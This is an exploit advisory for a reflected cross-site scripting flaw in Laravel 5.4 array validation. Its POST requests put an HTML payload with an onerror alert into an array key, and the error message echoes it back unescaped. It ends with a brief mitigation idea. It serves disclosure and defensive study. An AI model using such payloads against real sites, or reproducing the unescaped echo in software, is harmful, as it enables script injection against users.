# Exploit Title: Laravel non-presistent XSS in validation of arrays
# Date: 06/03/2017
# Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com)
# Vendor Homepage: laravel.com
# Version: 5.4

In Laravel validation rules, assume that you set a rule to get an array input.

$this->validate($request, [
    'lessons' => 'required|array',
    'lessons.*' => 'numeric'
]);

Here we say lessons should be array and the elements should be numeric.
Now let's enter a character there to fail the validation.

POST Request: lessons[]=1&lessons[]=4&lessons[]=abc

It tells {"lessons.2":["The lessons.2 must be a number."]}
That's OK up to here. But what if we place an index for the array.

POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc
Response: {"lessons.example":["The lessons.example must be a number."]}

POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x
onerror='alert(1)'>]=abc
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img
src=x onerror='alert(1)'> must be a number."]}
And it executes the alert with no problem...

You can see this bug already exists in Laravel official doc:
https://laravel.com/docs/master/validation#validating-arrays
Maybe the solution is to validate the array values yourself by for
example extending validation rules.

Regards,
MaHDyfo
Iran